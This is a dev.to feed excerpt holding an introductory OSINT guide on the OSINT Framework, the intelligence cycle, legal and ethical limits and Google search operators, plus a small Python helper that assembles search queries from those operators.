&lt;td&gt;🚢 &lt;strong&gt;Marine Traffic&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.marinetraffic.com/" rel="noopener noreferrer"&gt;marinetraffic.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Communities and Learning
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;🔍 &lt;strong&gt;Bellingcat&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.bellingcat.com/" rel="noopener noreferrer"&gt;bellingcat.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;💬 &lt;strong&gt;r/OSINT&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.reddit.com/r/OSINT/" rel="noopener noreferrer"&gt;reddit.com/r/OSINT&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;📰 &lt;strong&gt;DataJournalism.com&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://datajournalism.com/" rel="noopener noreferrer"&gt;datajournalism.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  About the Author
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;I'm passionate about open-source intelligence and the ways we can use publicly available information to uncover truth and promote transparency. Follow me for more OSINT guides and techniques.&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  📌 Tags
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;OSINT&lt;/code&gt; &lt;code&gt;Geolocation&lt;/code&gt; &lt;code&gt;EnvironmentalAnalysis&lt;/code&gt; &lt;code&gt;InvestigativeJournalism&lt;/code&gt; &lt;code&gt;OpenSourceIntelligence&lt;/code&gt; &lt;code&gt;DataJournalism&lt;/code&gt; &lt;code&gt;SatelliteImagery&lt;/code&gt; &lt;code&gt;GeospatialAnalysis&lt;/code&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;⚠️ &lt;strong&gt;Disclaimer:&lt;/strong&gt; The tools and techniques described in this guide are intended for ethical and legal use only. Always respect privacy, platform terms of service, and applicable laws when conducting OSINT investigations.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Reference: &lt;a href="https://freeosint.github.io/pages/training.html" rel="noopener noreferrer"&gt;FreeOSINT&lt;/a&gt;&lt;/p&gt;

</description>
      <category>infosec</category>
      <category>science</category>
      <category>security</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>The Ultimate Guide to OSINT: Framework, Ethics, Tools &amp; Techniques (OSINT Series Part 1)</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Sat, 20 Jun 2026 08:12:21 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/the-ultimate-guide-to-osint-framework-ethics-tools-techniques-part-1-2mli</link>
      <guid>https://dev.to/hitanshugedam/the-ultimate-guide-to-osint-framework-ethics-tools-techniques-part-1-2mli</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;Open Source Intelligence (OSINT) has emerged as a crucial discipline in the digital era, driven by the rapid growth of information available on the internet. Today, the internet grows by approximately 20-30% each year, with a significant portion consisting of open source content such as social media posts, public documents, and multimedia files. OSINT involves collecting, analyzing, and interpreting publicly available data to achieve specific investigative objectives, serving everyone from intelligence agencies and law enforcement to ethical hackers, journalists, and academic researchers.&lt;/p&gt;

&lt;p&gt;In this comprehensive guide, we'll explore the OSINT framework, ethical considerations, essential tools, and practical techniques that will help you become a more effective OSINT practitioner.&lt;/p&gt;




&lt;h2&gt;
  
  
  1) The OSINT Framework
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What is the OSINT Framework?
&lt;/h3&gt;

&lt;p&gt;The OSINT Framework is a centralized, web-based directory that organizes open-source intelligence tools into easily navigable categories. Created by security researcher Justin Nordine, it functions more like a roadmap than a single tool, connecting users with the best resources across multiple categories to support investigations in criminal investigations, corporate security, executive protection, cybersecurity, journalism, and law enforcement.&lt;/p&gt;

&lt;p&gt;The framework's modular design allows users to explore different categories pertaining to particular types of data, such as username checks, domain name hunting, or location-based data, enabling them to tailor their approach based on their specific needs. Being open-source means the framework is freely accessible to anyone interested in utilizing it for educational or professional purposes.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Features of the OSINT Framework
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Comprehensive Resource&lt;/strong&gt;: Vast collection of tools and resources organized hierarchically, ranging from search engines and social media analysis tools to data breach databases&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Modular Design&lt;/strong&gt;: Users can explore different categories that pertain to particular types of data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Accessibility&lt;/strong&gt;: Free and open to anyone interested in OSINT work&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Up-to-date Information&lt;/strong&gt;: Community-driven enhancements keep the framework current and relevant&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integration Ready&lt;/strong&gt;: Many tools can be incorporated into broader intelligence platforms or workflows&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  OSINT Framework Categories
&lt;/h3&gt;

&lt;p&gt;The OSINT Framework organizes its collection into clearly defined categories, each targeting a specific data type or investigative focus:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Example Resources&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Username&lt;/td&gt;
&lt;td&gt;Find profiles or linked accounts based on a username&lt;/td&gt;
&lt;td&gt;Namechk, KnowEm&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Email Address&lt;/td&gt;
&lt;td&gt;Trace emails to discover breaches or ownership&lt;/td&gt;
&lt;td&gt;HaveIBeenPwned, EmailRep&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Domain Name&lt;/td&gt;
&lt;td&gt;Gather WHOIS, DNS, and site-related info&lt;/td&gt;
&lt;td&gt;DomainTools, ViewDNS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IP and MAC Address&lt;/td&gt;
&lt;td&gt;IP location and device fingerprinting&lt;/td&gt;
&lt;td&gt;IPinfo, Wireshark&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Images/Videos/Docs&lt;/td&gt;
&lt;td&gt;Reverse search or metadata analysis&lt;/td&gt;
&lt;td&gt;Google Reverse Image, FotoForensics&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Social Networks&lt;/td&gt;
&lt;td&gt;Profile search and data analytics&lt;/td&gt;
&lt;td&gt;Social Searcher, Twint&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;People Search Engines&lt;/td&gt;
&lt;td&gt;Find publicly available info on individuals&lt;/td&gt;
&lt;td&gt;Pipl, Spokeo&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Public Records&lt;/td&gt;
&lt;td&gt;Access to government/public records&lt;/td&gt;
&lt;td&gt;SearchSystems, PACER&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Business Records&lt;/td&gt;
&lt;td&gt;Find business registration and ownership info&lt;/td&gt;
&lt;td&gt;OpenCorporates, Crunchbase&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Transportation&lt;/td&gt;
&lt;td&gt;Info on flights, ships, and vehicles&lt;/td&gt;
&lt;td&gt;FlightRadar24, MarineTraffic&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Geolocation Tools/Maps&lt;/td&gt;
&lt;td&gt;Identify location using maps and geotags&lt;/td&gt;
&lt;td&gt;Google Maps, EXIF Viewer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Archives&lt;/td&gt;
&lt;td&gt;Explore historical versions of web pages&lt;/td&gt;
&lt;td&gt;Wayback Machine&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Metadata&lt;/td&gt;
&lt;td&gt;Extract hidden data from files&lt;/td&gt;
&lt;td&gt;Metagoofil, FOCA&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dark Web&lt;/td&gt;
&lt;td&gt;Access and monitor darknet markets&lt;/td&gt;
&lt;td&gt;Tor Browser, Ahmia&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Threat Intelligence&lt;/td&gt;
&lt;td&gt;Threat feeds and indicators&lt;/td&gt;
&lt;td&gt;AlienVault OTX&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  2) The OSINT Cycle
&lt;/h2&gt;

&lt;p&gt;The OSINT cycle, also known as the intelligence cycle, describes the process of transforming raw data into finished intelligence for decision-makers to support action. This framework helps practitioners organize their approach and avoid missing critical information. The intelligence cycle consists of six interconnected phases:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Planning &amp;amp; Direction
&lt;/h3&gt;

&lt;p&gt;This phase involves defining areas of interest, preparing a collection plan, setting priorities, and developing an appropriate intelligence architecture. Intelligence requirements must align with and support the goals and activities of the organization or client. As one investigator aptly noted: "Give me six hours to chop down a tree and I will spend the first four sharpening the axe" — this stage is critical because it initiates the entire intelligence cycle.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key activities&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Define objectives, requirements, and scope of the investigation&lt;/li&gt;
&lt;li&gt;Identify the best sources of information&lt;/li&gt;
&lt;li&gt;Prepare a collection plan&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  2. Collection (Gathering)
&lt;/h3&gt;

&lt;p&gt;In this phase, relevant data is retrieved from publicly available open sources based on the target objective. The internet serves as a primary source due to the vast amount of accessible information. To begin the search, at least one data point about the target is required — an email address, username, real name, location, or IP address.&lt;/p&gt;

&lt;p&gt;Data obtained with one technique serve as input for generating further data with other techniques; this is the stage at which the whole intelligence-production process is set in motion.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key activities&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Gather information from various sources&lt;/li&gt;
&lt;li&gt;Use multiple search engines and techniques&lt;/li&gt;
&lt;li&gt;Document collection methodology&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3. Processing (Data Enrichment)
&lt;/h3&gt;

&lt;p&gt;This phase, also referred to as data enrichment, involves transforming collected raw data into understandable and valuable information. On their own, the data are not useful and must be interpreted to derive initial facts through preliminary analysis.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key activities&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Filter, validate, and organize collected data&lt;/li&gt;
&lt;li&gt;Extract relevant data from raw text using NLP techniques&lt;/li&gt;
&lt;li&gt;Perform feature extraction and entity recognition&lt;/li&gt;
&lt;li&gt;Distinguish signals from noise&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  4. Analysis &amp;amp; Production
&lt;/h3&gt;

&lt;p&gt;This phase involves knowledge extraction and inference. The information generated in the previous phase is used as input for advanced inference methods such as pattern recognition, behavior profiling, value prediction, and event correlation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key activities&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Examine processed information to identify patterns, relationships, and insights&lt;/li&gt;
&lt;li&gt;Look for trends and correlations&lt;/li&gt;
&lt;li&gt;Map relationships between individuals, organizations, or locations&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  5. Dissemination &amp;amp; Integration
&lt;/h3&gt;

&lt;p&gt;In this phase, intelligence is delivered to the consumer and put to use. The method of dissemination is determined by the client's needs and the criticality of intelligence. Intelligence personnel are responsible for ongoing support even after delivery, aiding in decision-making and responding to follow-up questions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key activities&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Present findings in a clear, actionable format&lt;/li&gt;
&lt;li&gt;Tailor reports to the audience&lt;/li&gt;
&lt;li&gt;Include methodology and key findings&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  6. Evaluation &amp;amp; Feedback
&lt;/h3&gt;

&lt;p&gt;Evaluation and feedback occur continuously throughout all stages. This phase requires ongoing dialogue between all intelligence personnel involved in production and intelligence consumers. The goal is to identify issues as early as possible to minimize information gaps and mitigate capability shortfalls.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key activities&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Evaluate the process and results&lt;/li&gt;
&lt;li&gt;Identify which sources were most valuable&lt;/li&gt;
&lt;li&gt;Improve future investigations&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  The Iterative Nature of the OSINT Cycle
&lt;/h3&gt;

&lt;p&gt;The intelligence cycle is an iterative process in which data is continuously fed into the system to produce a sequence of ongoing results. The process begins with data collection, followed by data enrichment and knowledge inference, and then loops back to the initial stage, repeating in a cyclical manner. Findings at any stage might prompt a return to earlier stages to refine the approach or gather additional information.&lt;/p&gt;

&lt;h3&gt;
  
  
  Example: OSINT Cycle in Action
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Scenario&lt;/strong&gt;: Investigating a company for potential business partnership&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Planning&lt;/strong&gt;: Define what you need to know (financial stability, reputation, leadership)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Collection&lt;/strong&gt;: Gather information from company website, news articles, financial reports, social media&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Processing&lt;/strong&gt;: Organize information chronologically, verify facts across multiple sources&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Analysis&lt;/strong&gt;: Identify patterns in company growth, leadership changes, market positioning&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dissemination&lt;/strong&gt;: Create a report with key findings and recommendations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Feedback&lt;/strong&gt;: Review which sources were most valuable for future investigations&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  3) OSINT Ethics and Legal Considerations
&lt;/h2&gt;

&lt;p&gt;The legal landscape governing OSINT activities extends far beyond the notion of "public availability." The erroneous presumption that publicly accessible information exists free from statutory constraints constitutes one of the most significant compliance risks facing practitioners today.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Legal Frameworks
&lt;/h3&gt;

&lt;p&gt;OSINT operations must comply with multiple, overlapping legal frameworks that impose substantive limitations on data collection and processing:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GDPR (EU)&lt;/strong&gt;: Sets strict rules on collecting and handling personal data, even when that data is publicly visible. Teams must justify purpose, minimize use, and apply safeguards.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CCPA/CPRA (California)&lt;/strong&gt;: Regulates how organizations gather and process personal information about California residents, including data found through open sources.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Computer Fraud and Abuse Act (US)&lt;/strong&gt;: Limits unauthorized access to systems or protected data. OSINT remains lawful only when collection stays within public, intentionally available information.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Platform-specific terms and regional privacy laws&lt;/strong&gt;: Many platforms restrict automated scraping or bulk data collection. Local privacy frameworks may also affect how long data can be stored or how it can be shared.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Key Ethical Considerations
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Respect for privacy and personal boundaries&lt;/li&gt;
&lt;li&gt;Adherence to terms of service of platforms and websites&lt;/li&gt;
&lt;li&gt;Awareness of copyright and intellectual property rights&lt;/li&gt;
&lt;li&gt;Consideration of potential harm from information disclosure&lt;/li&gt;
&lt;li&gt;Transparency about methods and limitations&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Example: Ethical Dilemma
&lt;/h3&gt;

&lt;p&gt;You find a public social media profile that contains potentially valuable information for your investigation. The information is technically public, but it's clear the person didn't intend for it to be widely accessible.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Ethical questions to consider&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Is this information truly necessary for your investigation?&lt;/li&gt;
&lt;li&gt;Could using this information cause harm to the individual?&lt;/li&gt;
&lt;li&gt;Would you be comfortable explaining your methods to others?&lt;/li&gt;
&lt;li&gt;Are there alternative sources for this information?&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Legal Considerations in Practice
&lt;/h3&gt;

&lt;p&gt;The study of OSINT tools and techniques highlights that "the future of OSINT depends not only on technological advancement, but also on strong legal and ethical responsibility to mitigate risks of liability and reputational harm".&lt;/p&gt;

&lt;p&gt;When in doubt, err on the side of caution and respect for privacy. Developing a personal ethical framework for OSINT work is essential for responsible practice.&lt;/p&gt;




&lt;h2&gt;
  
  
  4) OSINT Tools and Resources
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Building Your OSINT Toolkit
&lt;/h3&gt;

&lt;p&gt;A well-rounded OSINT toolkit should include tools from each of the essential categories covered in the sections that follow.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key Principles&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Purpose-Driven Selection&lt;/strong&gt;: Choose tools based on your specific investigation needs&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Redundancy&lt;/strong&gt;: Have multiple tools that can accomplish similar tasks&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security Awareness&lt;/strong&gt;: Consider the security implications of each tool&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Learning Curve&lt;/strong&gt;: Balance capability with ease of use&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integration&lt;/strong&gt;: Consider how tools work together in your workflow&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Search and Discovery Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
  General Search Engines
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Google&lt;/strong&gt;: Most powerful search engine when used with advanced operators&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bing&lt;/strong&gt;: Microsoft's search engine, sometimes indexes content Google misses&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DuckDuckGo&lt;/strong&gt;: Privacy-focused search engine that doesn't track users&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Yandex&lt;/strong&gt;: Russian search engine with strong image search capabilities&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Baidu&lt;/strong&gt;: Chinese search engine useful for investigations in Asia&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Specialized Search Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Google Dorking&lt;/strong&gt;: Using advanced Google search operators for precise queries&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Shodan&lt;/strong&gt;: Search engine for internet-connected devices&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Archive.org (Wayback Machine)&lt;/strong&gt;: Access to archived versions of websites&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Google Dataset Search&lt;/strong&gt;: Search engine for datasets&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Google Scholar&lt;/strong&gt;: Search engine for academic papers&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Basic Search Operators
&lt;/h3&gt;

&lt;p&gt;Search operators form the foundation of advanced searching and can be combined to create highly specific queries:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Operator&lt;/th&gt;
&lt;th&gt;Function&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;" "&lt;/code&gt; (quotation marks)&lt;/td&gt;
&lt;td&gt;Search for an exact phrase&lt;/td&gt;
&lt;td&gt;&lt;code&gt;"open source intelligence"&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;-&lt;/code&gt; (minus sign)&lt;/td&gt;
&lt;td&gt;Exclude a term&lt;/td&gt;
&lt;td&gt;&lt;code&gt;osint -government&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;OR&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Search for either term&lt;/td&gt;
&lt;td&gt;&lt;code&gt;osint OR "open source intelligence"&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;AND&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Search for both terms&lt;/td&gt;
&lt;td&gt;&lt;code&gt;osint AND ethics&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;( )&lt;/code&gt; (parentheses)&lt;/td&gt;
&lt;td&gt;Group operators&lt;/td&gt;
&lt;td&gt;&lt;code&gt;(osint OR intelligence) AND tools&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Example&lt;/strong&gt;: To find information about Python (the programming language) while excluding results about snakes:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;python programming -snake
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Google-Specific Operators
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Operator&lt;/th&gt;
&lt;th&gt;Function&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;site:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Limit results to a specific website or domain&lt;/td&gt;
&lt;td&gt;&lt;code&gt;site:example.com osint&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;filetype:&lt;/code&gt; / &lt;code&gt;ext:&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Find specific file types&lt;/td&gt;
&lt;td&gt;&lt;code&gt;filetype:pdf "osint methodology"&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;intitle:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Find pages with specific words in the title&lt;/td&gt;
&lt;td&gt;&lt;code&gt;intitle:osint tools&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;inurl:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Find pages with specific words in the URL&lt;/td&gt;
&lt;td&gt;&lt;code&gt;inurl:security osint&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;intext:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Find pages with specific words in the content&lt;/td&gt;
&lt;td&gt;&lt;code&gt;intext:"social media investigation"&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;after:&lt;/code&gt; / &lt;code&gt;before:&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Limit results to a specific time period&lt;/td&gt;
&lt;td&gt;&lt;code&gt;osint after:2022-01-01 before:2022-12-31&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;related:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Find websites related to a specific URL&lt;/td&gt;
&lt;td&gt;&lt;code&gt;related:example.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;cache:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;View Google's cached version of a page&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cache:example.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;info:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Get information about a specific URL&lt;/td&gt;
&lt;td&gt;&lt;code&gt;info:example.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;link:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Find pages that link to a specific URL&lt;/td&gt;
&lt;td&gt;&lt;code&gt;link:example.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;*&lt;/code&gt; (wildcard)&lt;/td&gt;
&lt;td&gt;Replace unknown words in a phrase&lt;/td&gt;
&lt;td&gt;&lt;code&gt;"best * for osint"&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Advanced Google Operators
&lt;/h3&gt;

&lt;p&gt;For sophisticated OSINT investigations, the &lt;code&gt;AROUND(n)&lt;/code&gt; operator is particularly powerful. It finds documents in which the terms on either side of it appear within n words of each other, which indicates a stronger relationship between the concepts than mere co-occurrence on the same page.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Example&lt;/strong&gt;: To find recent discussions about cybersecurity threats in the context of OSINT:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;"cybersecurity threats" AROUND(3) osint after:2023-01-01
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
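&lt;p&gt;As an added example (not part of the original post), the following Python helper assembles the operators from the tables above into one query string: it quotes multi-word phrases, groups OR alternatives, validates the dates passed to &lt;code&gt;after:&lt;/code&gt; and &lt;code&gt;before:&lt;/code&gt;, and emits the &lt;code&gt;AROUND(n)&lt;/code&gt; form. The function and parameter names are my own.&lt;/p&gt;

```python
"""Compose a search query from the operators in the tables above.

Added example, not code from the original post. Function and parameter
names are my own; the operators are the ones documented on the page.
"""
import re
from datetime import date

# The after:/before: operators take ISO dates (YYYY-MM-DD).
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def valid_date(value):
    """True only for a well-formed, real calendar date."""
    if not DATE_RE.match(value):
        return False
    try:
        date.fromisoformat(value)   # rejects e.g. 2023-13-40
    except ValueError:
        return False
    return True


def date_order_ok(after, before):
    """after: must not be later than before:; ISO dates sort as strings."""
    return max(after, before) == before


def quote_phrase(phrase):
    """Wrap a multi-word term in double quotes so it is matched exactly.

    Single words stay bare. Embedded double quotes are removed because they
    would split the phrase into separate terms.
    """
    cleaned = phrase.replace('"', "").strip()
    if " " in cleaned:
        return f'"{cleaned}"'
    return cleaned


def build_query(terms, exclude=(), any_of=(), site=None, filetype=None,
                intitle=None, after=None, before=None, near=None):
    """Return one query string combining the requested operators.

    terms    words or phrases that must all appear (AND is implicit)
    exclude  terms removed with the minus operator
    any_of   alternatives joined with OR inside parentheses
    near     (phrase_a, phrase_b, n) for the AROUND(n) proximity operator
    """
    parts = [quote_phrase(t) for t in terms]

    if any_of:
        group = " OR ".join(quote_phrase(t) for t in any_of)
        parts.append(f"({group})")

    if near is not None:
        left, right, n = near
        if not isinstance(n, int) or n == 0 or n != abs(n):
            raise ValueError("AROUND(n) needs a positive integer n")
        parts.append(f"{quote_phrase(left)} AROUND({n}) {quote_phrase(right)}")

    if site:
        parts.append(f"site:{site.strip().lower()}")
    if filetype:
        # The extension is given without a leading dot: filetype:pdf
        parts.append(f"filetype:{filetype.strip().lstrip('.').lower()}")
    if intitle:
        parts.append(f"intitle:{quote_phrase(intitle)}")

    for operator, value in (("after", after), ("before", before)):
        if value:
            if not valid_date(value):
                raise ValueError(f"{operator}: expected YYYY-MM-DD, got {value!r}")
            parts.append(f"{operator}:{value}")
    if after and before and not date_order_ok(after, before):
        raise ValueError("after: date is later than before: date")

    # Exclusions go last so the positive part of the query reads naturally.
    for term in exclude:
        parts.append(f"-{quote_phrase(term)}")

    return " ".join(parts)
```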



&lt;h3&gt;
  
  
